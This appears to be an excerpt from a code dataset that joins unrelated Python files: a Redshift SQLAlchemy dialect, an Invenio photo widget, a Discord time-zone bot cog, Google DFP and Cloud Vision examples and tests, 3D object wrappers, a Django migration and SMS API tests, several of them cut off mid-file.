# See https://docs.aws.amazon.com/redshift/latest/dg/r_names.html
# for a definition of valid SQL identifiers.
FOREIGN_KEY_RE = re.compile(r"""
^FOREIGN\ KEY \s* \( # FOREIGN KEY, arbitrary whitespace, literal '('
(?P<columns> # Start a group to capture the referring columns
(?: # Start a non-capturing group
\s* # Arbitrary whitespace
([_a-zA-Z][\w$]* | ("[^"]+")+) # SQL identifier
\s* # Arbitrary whitespace
,? # There will be a comma if this isn't the last one
)+ # Close the non-capturing group; require at least one
) # Close the 'columns' group
\s* \) # Arbitrary whitespace and literal ')'
\s* REFERENCES \s*
(?P<referred_table> # Start a group to capture the referred table name
([_a-zA-Z][\w$]* | ("[^"]*")+) # SQL identifier
)
\s* \( \s* # Literal '(' surrounded by arbitrary whitespace
(?P<referred_column> # Start a group to capture the referred column name
([_a-zA-Z][\w$]* | ("[^"]*")+) # SQL identifier
)
\s* \) # Arbitrary whitespace and literal ')'
""", re.VERBOSE)
# Regex for primary key constraints, e.g.:
# PRIMARY KEY (col1, col2)
PRIMARY_KEY_RE = re.compile(r"""
^PRIMARY \s* KEY \s* \( # PRIMARY KEY, arbitrary whitespace, literal '('
(?P<columns> # Start a group to capture column names
(?:
\s* # Arbitrary whitespace
( [_a-zA-Z][\w$]* | ("[^"]*")+ ) # SQL identifier or delimited identifier
\s* # Arbitrary whitespace
,? # There will be a comma if this isn't the last one
)+ # Close the non-capturing group; require at least one
)
\s* \) \s* # Arbitrary whitespace and literal ')'
""", re.VERBOSE)
def _get_relation_key(name, schema):
if schema is None:
return name
else:
return schema + "." + name
def _get_schema_and_relation(key):
if '.' not in key:
return (None, key)
identifiers = SQL_IDENTIFIER_RE.findall(key)
if len(identifiers) == 1:
return (None, key)
elif len(identifiers) == 2:
return identifiers
raise ValueError("%s does not look like a valid relation identifier" % key)
def unquoted(key):
"""
Return *key* with one level of double quotes removed.
Redshift stores some identifiers without quotes in internal tables,
even though the name must be quoted elsewhere.
In particular, this happens for tables named as a keyword.
"""
if key.startswith('"') and key.endswith('"'):
return key[1:-1]
return key
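# Illustrative examples (not in the original source):
#   unquoted('"select"') -> 'select'    (one level of quotes stripped)
#   unquoted('my_table') -> 'my_table'  (unquoted names pass through)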
class RedshiftCompiler(PGCompiler):
def visit_now_func(self, fn, **kw):
return "SYSDATE"
class RedShiftDDLCompiler(PGDDLCompiler):
"""
Handles Redshift-specific CREATE TABLE syntax.
Users can specify the DISTSTYLE, DISTKEY, SORTKEY and ENCODE properties per
table and per column.
Table level properties can be set using the dialect specific syntax. For
example, to specify a distribution key and style you apply the following ::
>>> import sqlalchemy as sa
>>> from sqlalchemy.schema import CreateTable
>>> engine = sa.create_engine('redshift+psycopg2://example')
>>> metadata = sa.MetaData()
>>> user = sa.Table(
... 'user',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String),
... redshift_diststyle='KEY',
... redshift_distkey='id',
... redshift_interleaved_sortkey=['id', 'name'],
... )
>>> print(CreateTable(user).compile(engine))
<BLANKLINE>
CREATE TABLE "user" (
id INTEGER NOT NULL,
name VARCHAR,
PRIMARY KEY (id)
) DISTSTYLE KEY DISTKEY (id) INTERLEAVED SORTKEY (id, name)
<BLANKLINE>
<BLANKLINE>
A single sort key can be applied without a wrapping list ::
>>> customer = sa.Table(
... 'customer',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String),
... redshift_sortkey='id',
... )
>>> print(CreateTable(customer).compile(engine))
<BLANKLINE>
CREATE TABLE customer (
id INTEGER NOT NULL,
name VARCHAR,
PRIMARY KEY (id)
) SORTKEY (id)
<BLANKLINE>
<BLANKLINE>
Column-level special syntax can also be applied using the column info
dictionary. For example, we can specify the ENCODE for a column ::
>>> product = sa.Table(
... 'product',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column('name', sa.String, info={'encode': 'lzo'})
... )
>>> print(CreateTable(product).compile(engine))
<BLANKLINE>
CREATE TABLE product (
id INTEGER NOT NULL,
name VARCHAR ENCODE lzo,
PRIMARY KEY (id)
)
<BLANKLINE>
<BLANKLINE>
We can also specify the distkey and sortkey options ::
>>> sku = sa.Table(
... 'sku',
... metadata,
... sa.Column('id', sa.Integer, primary_key=True),
... sa.Column(
... 'name', sa.String, info={'distkey': True, 'sortkey': True}
... )
... )
>>> print(CreateTable(sku).compile(engine))
<BLANKLINE>
CREATE TABLE sku (
id INTEGER NOT NULL,
name VARCHAR DISTKEY SORTKEY,
PRIMARY KEY (id)
)
<BLANKLINE>
<BLANKLINE>
"""
def post_create_table(self, table):
text = ""
info = table.dialect_options['redshift']
diststyle = info.get('diststyle')
if diststyle:
diststyle = diststyle.upper()
if diststyle not in ('EVEN', 'KEY', 'ALL'):
raise exc.CompileError(
u"diststyle {0} is invalid".format(diststyle)
)
text += " DISTSTYLE " + diststyle
distkey = info.get('distkey')
if distkey:
text += " DISTKEY ({0})".format(distkey)
sortkey = info.get('sortkey')
interleaved_sortkey = info.get('interleaved_sortkey')
if sortkey and interleaved_sortkey:
raise exc.ArgumentError(
"Parameters sortkey and interleaved_sortkey are "
"mutually exclusive; you may not specify both."
)
if sortkey or interleaved_sortkey:
if isinstance(sortkey, str):
keys = [sortkey]
else:
keys = sortkey or interleaved_sortkey
keys = [key.name if isinstance(key, Column) else key
for key in keys]

ppiotr/Bibedit-some-refactoring | modules/webjournal/lib/widgets/bfe_webjournal_widget_latestPhoto.py | Python | gpl-2.0 | size 3,928 | score 0.005855

# -*- coding: utf-8 -*-
##
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebJournal widget - display photos from given collections
"""
from invenio.bibformat_engine import BibFormatObject
from invenio.search_engine import perform_request_search
from invenio.config import CFG_CERN_SITE, CFG_SITE_URL
def format(bfo, collections, max_photos="3", separator="<br/>"):
"""
Display the latest pictures from the given collection(s)
@param collections: comma-separated list of collection form which photos have to be fetched
@param max_photos: maximum number of photos to display
@param separator: separator between photos
"""
try:
int_max_photos = int(max_photos)
except:
int_max_photos = 0
try:
collections_list = [coll.strip() for coll in collections.split(',')]
except:
collections_list = []
out = get_widget_html(bfo.lang, int_max_photos,
collections_list, separator, bfo.lang)
return out
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
def get_widget_html(language, max_photos, collections, separator, ln):
"""
Returns the content of the widget
"""
latest_photo_ids = perform_request_search(c=collections,
rg=max_photos,
of='id')
images_urls = []
for recid in latest_photo_ids[:max_photos]:
try:
photo_record = BibFormatObject(recid)
except:
# todo: Exception, no photo in this selection
continue
if language == "fr":
try:
title = photo_record.fields('246_1a', escape=1)[0]
except KeyError:
title = ""
else:
try:
title = photo_record.fields('245__a', escape=1)[0]
except KeyError:
# todo: exception, picture with no title
title = ""
if CFG_CERN_SITE and photo_record.fields('8567_'):
# Get from 8567_
dfs_images = photo_record.fields('8567_')
for image_block in dfs_images:
if image_block.get("y", '') == "Icon":
if image_block.get("u", '').startswith("http://"):
images_urls.append((recid, image_block["u"], title))
break # Just one image per record
else:
# Get from 8564_
images = photo_record.fields('8564_')
for image_block in images:
if image_block.get("x", '').lower() == "icon":
if image_block.get("q", '').startswith("http://"):
images_urls.append((recid, image_block["q"], title))
break # Just one image per record
# Build output
html_out = separator.join(['<a href="%s/record/%i?ln=%s"><img class="phr" width="100" height="67" src="%s"/>%s</a>' % (CFG_SITE_URL, recid, ln, photo_url, title) for (recid, photo_url, title) in images_urls])
return html_out

TheMasterGhost/CorpBot | Cogs/Time.py | Python | mit | size 8,457 | score 0.03299

import asyncio
import discord
import datetime
import pytz
from discord.ext import commands
from Cogs import FuzzySearch
from Cogs import Settings
from Cogs import DisplayName
from Cogs import Message
from Cogs import Nullify
class Time:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
@commands.command(pass_context=True)
async def settz(self, ctx, *, tz : str = None):
"""Sets your TimeZone - Overrides your UTC offset - and accounts for DST."""
usage = 'Usage: `{}settz [Region/City]`\nYou can get a list of available TimeZones with `{}listtz`'.format(ctx.prefix, ctx.prefix)
if not tz:
self.settings.setGlobalUserStat(ctx.author, "TimeZone", None)
await ctx.channel.send("*{}*, your TimeZone has been removed!".format(DisplayName.name(ctx.author)))
return
# Let's get the timezone list
tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
if not tz_list[0]['Ratio'] == 1:
# We didn't find a complete match
msg = "I couldn't find that TimeZone!\n\nMaybe you meant one of the following?\n```"
for tz in tz_list:
msg += tz['Item'] + "\n"
msg += '```'
await ctx.channel.send(msg)
return
# We got a time zone
self.settings.setGlobalUserStat(ctx.author, "TimeZone", tz_list[0]['Item'])
await ctx.channel.send("TimeZone set to *{}!*".format(tz_list[0]['Item']))
@commands.command(pass_context=True)
async def listtz(self, ctx, *, tz_search = None):
"""List all the supported TimeZones in PM."""
if not tz_search:
msg = "__Available TimeZones:__\n\n"
for tz in pytz.all_timezones:
msg += tz + "\n"
else:
tz_list = FuzzySearch.search(tz_search, pytz.all_timezones)
msg = "__Top 3 TimeZone Matches:__\n\n"
for tz in tz_list:
msg += tz['Item'] + "\n"
await Message.say(self.bot, msg, ctx.channel, ctx.author, 1)
@commands.command(pass_context=True)
async def tz(self, ctx, *, member = None):
"""See a member's TimeZone."""
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
if member == None:
member = ctx.message.author
if type(member) == str:
# Try to get a user first
memberName = member
member = DisplayName.memberForName(memberName, ctx.message.guild)
if not member:
msg = 'Couldn\'t find user *{}*.'.format(memberName)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
return
# We got one
timezone = self.settings.getGlobalUserStat(member, "TimeZone")
if timezone == None:
msg = '*{}* hasn\'t set their TimeZone yet - they can do so with the `{}settz [Region/City]` command.'.format(DisplayName.name(member), ctx.prefix)
await ctx.channel.send(msg)
return
msg = '*{}\'s* TimeZone is *{}*'.format(DisplayName.name(member), timezone)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def setoffset(self, ctx, *, offset : str = None):
"""Set your UTC offset."""
if offset == None:
self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", None)
msg = '*{}*, your UTC offset has been removed!'.format(DisplayName.name(ctx.message.author))
await ctx.channel.send(msg)
return
offset = offset.replace('+', '')
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
await ctx.channel.send('Offset has to be in +-H:M!')
return
off = "{}:{}".format(hours, minutes)
self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", off)
msg = '*{}*, your UTC offset has been set to *{}!*'.format(DisplayName.name(ctx.message.author), off)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def offset(self, ctx, *, member = None):
"""See a member's UTC offset."""
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
if member == None:
member = ctx.message.author
if type(member) == str:
# Try to get a user first
memberName = member
member = DisplayName.memberForName(memberName, ctx.message.guild)
if not member:
msg = 'Couldn\'t find user *{}*.'.format(memberName)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
return
# We got one
offset = self.settings.getGlobalUserStat(member, "UTCOffset")
if offset == None:
msg = '*{}* hasn\'t set their offset yet - they can do so with the `{}setoffset [+-offset]` command.'.format(DisplayName.name(member), ctx.prefix)
await ctx.channel.send(msg)
return
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
await ctx.channel.send('Offset has to be in +-H:M!')
return
msg = 'UTC'
# Apply offset
if hours > 0:
# Apply positive offset
msg += '+{}'.format(offset)
elif hours < 0:
# Apply negative offset
msg += '{}'.format(offset)
msg = '*{}\'s* offset is *{}*'.format(DisplayName.name(member), msg)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def time(self, ctx, *, offset : str = None):
"""Get UTC time +- an offset."""
timezone = None
if offset == None:
member = ctx.message.author
else:
# Try to get a user first
member = DisplayName.memberForName(offset, ctx.message.guild)
if member:
# We got one
# Check for timezone first
offset = self.settings.getGlobalUserStat(member, "TimeZone")
if offset == None:
offset = self.settings.getGlobalUserStat(member, "UTCOffset")
if offset == None:
msg = '*{}* hasn\'t set their TimeZone or offset yet - they can do so with the `{}setoffset [+-offset]` or `{}settz [Region/City]` command.\nThe current UTC time is *{}*.'.format(DisplayName.name(member), ctx.prefix, ctx.prefix, datetime.datetime.utcnow().strftime("%I:%M %p"))
await ctx.channel.send(msg)
return
# At this point - we need to determine if we have an offset - or possibly a timezone passed
t = self.getTimeFromTZ(offset)
if t == None:
# We did not get an offset
t = self.getTimeFromOffset(offset)
if t == None:
await ctx.channel.send("I couldn't find that TimeZone or offset!")
return
if member:
msg = '{}; where *{}* is, it\'s currently *{}*'.format(t["zone"], DisplayName.name(member), t["time"])
else:
msg = '{} is currently *{}*'.format(t["zone"], t["time"])
# Say message
await ctx.channel.send(msg)
def getTimeFromOffset(self, offset):
offset = offset.replace('+', '')
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
return None
# await ctx.channel.send('Offset has to be in +-H:M!')
# return
msg = 'UTC'
# Get the time
t = datetime.datetime.utcnow()
# Apply offset
if hours > 0:
# Apply positive offset
msg += '+{}'.format(offset)
td = datetime.timedelta(hours=hours, minutes=minutes)
newTime = t + td
elif hours < 0:
# Apply negative offset
msg += '{}'.format(offset)
td = datetime.timedelta(hours=(-1*hours), minutes=(-1*minutes))
newTime = t - td
else:
# No offset
newTime = t
return { "zone" : msg, "time" : newTime.strftime("%I:%M %p") }
def getTimeFromTZ(self, tz):
# Assume sanitized zones - as they're pulled from pytz
# Let's get the timezone list
tz_list = FuzzySearch.search(tz, pytz.all_

donspaulding/adspygoogle | examples/adspygoogle/dfp/v201302/inventory_service/get_ad_unit_hierarchy.py | Python | apache-2.0 | size 3,490 | score 0.010029

#!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code gets the ad unit hierarchy and displays it as a tree.
To create ad units, run create_ad_units.py
Tags: InventoryService.getAdUnit
Tags: NetworkService.getCurrentNetwork
"""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.dfp import DfpUtils
def main(client):
# Initialize appropriate service.
inventory_service = client.GetService('InventoryService', version='v201302')
# Get ad units by statement.
all_ad_units = DfpUtils.GetAllEntitiesByStatementWithService(
inventory_service)
# Find the root ad unit. root_ad_unit can also be set to child unit to only
# build and display a portion of the tree.
# i.e. root_ad_unit = inventory_service.GetAdUnit('INSERT_AD_UNIT_HERE')[0]
response = DfpUtils.GetAllEntitiesByStatementWithService(
inventory_service, query='WHERE parentId IS NULL')
root_ad_unit = {}
if response:
root_ad_unit = response[0]
if root_ad_unit:
BuildAndDisplayAdUnitTree(response[0], all_ad_units)
else:
print 'Could not build tree. No root ad unit found.'
def DisplayAdUnitTree(root_ad_unit, ad_unit_tree, depth=0):
"""Helper for displaying ad unit tree.
Args:
root_ad_unit: dict the root ad unit.
ad_unit_tree: dict the tree of ad units.
[optional]
depth: int the depth the tree has reached.
"""
print '%s%s (%s)' % (GenerateTab(depth), root_ad_unit['name'],
root_ad_unit['id'])
if root_ad_unit['id'] in ad_unit_tree:
for child in ad_unit_tree[root_ad_unit['id']]:
DisplayAdUnitTree(child, ad_unit_tree, depth+1)
def GenerateTab(depth):
"""Generate tabs to represent branching to children.
Args:
depth: int the depth the tree has reached.
Returns:
string inserted in front of the root unit.
"""
tab_list = []
if depth > 0:
tab_list.append(' ')
tab_list.append('| ' * depth)
tab_list.append('+--')
return ''.join(tab_list)
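# Illustrative (not in the original source): GenerateTab(0) returns '+--' and
# GenerateTab(2) returns ' | | +--', so a depth-2 ad unit prints as:
#  | | +--Ad unit name (id)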
def BuildAndDisplayAdUnitTree(root_ad_unit, all_ad_units):
"""Create an ad unit tree and display it.
Args:
root_ad_unit: dict the root ad unit to build the tree under.
all_ad_units: list the list of all ad units to build the tree with.
"""
tree = {}
for ad_unit in all_ad_units:
if 'parentId' in ad_unit:
if ad_unit['parentId'] not in tree:
tree[ad_unit['parentId']] = []
tree[ad_unit['parentId']].append(ad_unit)
DisplayAdUnitTree(root_ad_unit, tree)
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client)

apache/incubator-airflow | tests/providers/google/cloud/hooks/test_vision.py | Python | apache-2.0 | size 38,031 | score 0.003523

#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
import pytest
from google.cloud.vision import enums
from google.cloud.vision_v1 import ProductSearchClient
from google.cloud.vision_v1.proto.image_annotator_pb2 import (
AnnotateImageResponse,
EntityAnnotation,
SafeSearchAnnotation,
)
from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage
from google.protobuf.json_format import MessageToDict
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook
from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id
PROJECT_ID_TEST = 'project-id'
PROJECT_ID_TEST_2 = 'project-id-2'
LOC_ID_TEST = 'loc-id'
LOC_ID_TEST_2 = 'loc-id-2'
PRODUCTSET_ID_TEST = 'ps-id'
PRODUCTSET_ID_TEST_2 = 'ps-id-2'
PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}'
PRODUCT_ID_TEST = 'p-id'
PRODUCT_ID_TEST_2 = 'p-id-2'
PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
REFERENCE_IMAGE_ID_TEST = 'ri-id'
REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id'
ANNOTATE_IMAGE_REQUEST = {
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
}
BATCH_ANNOTATE_IMAGE_REQUEST = [
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
]
REFERENCE_IMAGE_NAME_TEST = (
f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/"
f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}"
)
REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST)
REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage()
DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}}
DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"}
class TestGcpVisionHook(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.hook = CloudVisionHook(gcp_conn_id='test')
@mock.patch(
"airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info",
new_callable=mock.PropertyMock,
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient")
def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value
)
assert mock_client.return_value == result
assert self.hook._client == result
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_explicit_id(self, get_conn):
# Given
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# ProductSet ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCTSET_ID_TEST
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=PRODUCTSET_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-id'
response_product_set = ProductSet(
name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST
)
# Then
# ProductSet ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product_set = None
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=None,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_get_productset(self, get_conn):
# Given
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
response_product_set = ProductSet(name=name)
        get_product_set_method = get_conn.return_value.get_product_set
|
JoyTeam/metagam3d
|
python/metagam3d/objects.py
|
Python
|
lgpl-3.0
| 3,360
| 0.004762
|
import _metagam3d
from _metagam3d import AxisAlignment, AlignmentType
from metagam3d.channels import blocking
from metagam3d.scripts import m3d_expr
from concurrence import Tasklet
class LoadError(Exception):
pass
class Object(_metagam3d.Object):
def __init__(self, objid):
        _metagam3d.Object.__init__(self, objid)
self._params = {}
def param(self, paramid):
"Get parameter object for given parameter id"
try:
return self._params[paramid]
except KeyError:
pass
param = ObjectParam(self, paramid)
self._params[paramid] = param
return param
def load(self, filename, flags=0):
"Load and return new subobject from file"
objid = _metagam3d._loadObject(filename, self.id, flags)
if objid is None:
raise LoadError("Error loading %s" % filename)
return Object(objid)
def createText(self, axisAlignment=AxisAlignment.XY_PLANE, alignment=AlignmentType.CENTER_CENTER):
"Create text object"
return Object(_metagam3d._createText(self.id, axisAlignment, alignment))
def getParam(self, paramid, t):
return self.param(paramid).getValue(t)
def setParam(self, paramid, val):
if type(val) is not _metagam3d.DynamicValue:
if type(val) is not _metagam3d.Variant:
val = _metagam3d.Variant(val)
val = _metagam3d.DynamicValue(val)
self.param(paramid).setValue(val)
def setParam3(self, paramid, x, y, z):
self.setParam(paramid, _metagam3d.Vec3d(x, y, z))
def setParamExpr(self, paramid, expr, till=None):
self.param(paramid).setValue(m3d_expr(expr, till))
def assignMaterial(self, geodeName, ambient=0, diffuse=0, specular=0, emission=0, shininess=0):
_metagam3d._assignMaterial(self.id, geodeName, ambient, diffuse, specular, emission, shininess)
def createConsole(self, cols=80, rows=25, fontSize=1.0):
return Console(_metagam3d._createConsole(self.id, cols, rows, fontSize))
def createLine(self):
return Object(_metagam3d._createLine(self.id))
def destroyAfter(self, t):
Tasklet.new(self._destroyAfter)(t)
def _destroyAfter(self, t):
Tasklet.sleep(t)
self.destroy()
class Console(Object):
def println(self, elements):
line = _metagam3d.ConsoleLine()
for el in elements:
line.add(_metagam3d.ConsoleLineElement(el[0], el[1]))
_metagam3d._printConsole(self.id, line)
class ObjectParam(_metagam3d.ObjectParam):
def __init__(self, obj, paramid):
_metagam3d.ObjectParam.__init__(self, obj.id, paramid)
self._obj = obj
@property
def obj(self):
return self._obj
def load(filename, flags=0):
"Load root level object from file"
objid = _metagam3d._loadObject(filename, 0, flags)
if objid is None:
raise LoadError("Error loading %s" % filename)
return Object(objid)
def createText(axisAlignment=AxisAlignment.XY_PLANE, alignment=AlignmentType.CENTER_CENTER):
"Create text object"
return Object(_metagam3d._createText(0, axisAlignment, alignment))
def createConsole(cols=80, rows=25, fontSize=1.0):
return Console(_metagam3d._createConsole(0, cols, rows, fontSize))
def createLine():
return Object(_metagam3d._createLine(0))
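# Illustrative usage sketch (assumes a running metagam3d scene; the model
# path and the parameter id below are hypothetical):
#   obj = load("models/ship.osg")
#   obj.setParam3(1, 0.0, 2.0, 0.0)  # hypothetical Vec3d parameter with id 1
#   obj.destroyAfter(5.0)            # remove the object after 5 seconds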
|
danithaca/berrypicking
|
django/advanced/crop/migrations/0002_auto_20150123_1831.py
|
Python
|
gpl-2.0
| 628
| 0.001592
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import image_cropping.fields
class Migration(migrations.Migration):
dependencies = [
('crop', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='cropping',
            field=image_cropping.fields.ImageRatioField('avatar', '200x200', verbose_name='cropping', help_text=None, adapt_rotation=False, size_warning=False, free_crop=False, hide_image_field=False, allow_fullsize=False),
            preserve_default=True,
        ),
]
|
mediaburst/clockwork-python
|
tests/clockwork_tests.py
|
Python
|
mit
| 3,369
| 0.004808
|
# -*- coding: utf-8 -*-
import unittest
from clockwork import clockwork
from clockwork import clockwork_exceptions
class ApiTests(unittest.TestCase):
api_key = "YOUR_API_KEY_HERE"
def test_should_send_single_message(self):
"""Sending a single SMS with the minimum detail and no errors should work"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="441234567890", message="This is a test message")
response = api.send(sms)
self.assertTrue(response.success)
def test_should_send_single_unicode_message(self):
"""Sending a single SMS with the full GSM character set (apart from ESC and form feed) should work"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(
to="441234567890",
#Message table copied from http://www.clockworksms.com/doc/reference/faqs/gsm-character-set/
message=u'''@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞÆæßÉ'''
u''' !"#¤%&'()*+,-./'''
u'''0123456789:;<=>?'''
u'''¡ABCDEFGHIJKLMNO'''
u'''PQRSTUVWXYZÄÖÑܧ'''
u'''¿abcdefghijklmno'''
            u'''pqrstuvwxyzäöñüà'''
u'''€[\]^{|}~'''
,long=True)
response = api.send(sms)
self.assertTrue(response.success)
def test_should_fail_with_no_message(self):
"""Sending a single SMS with no message should fail"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="441234567890", message="")
response = api.send(sms)
self.assertFalse(response.success)
    def test_should_fail_with_no_to(self):
"""Sending a single SMS with no message should fail"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="", message="This is a test message")
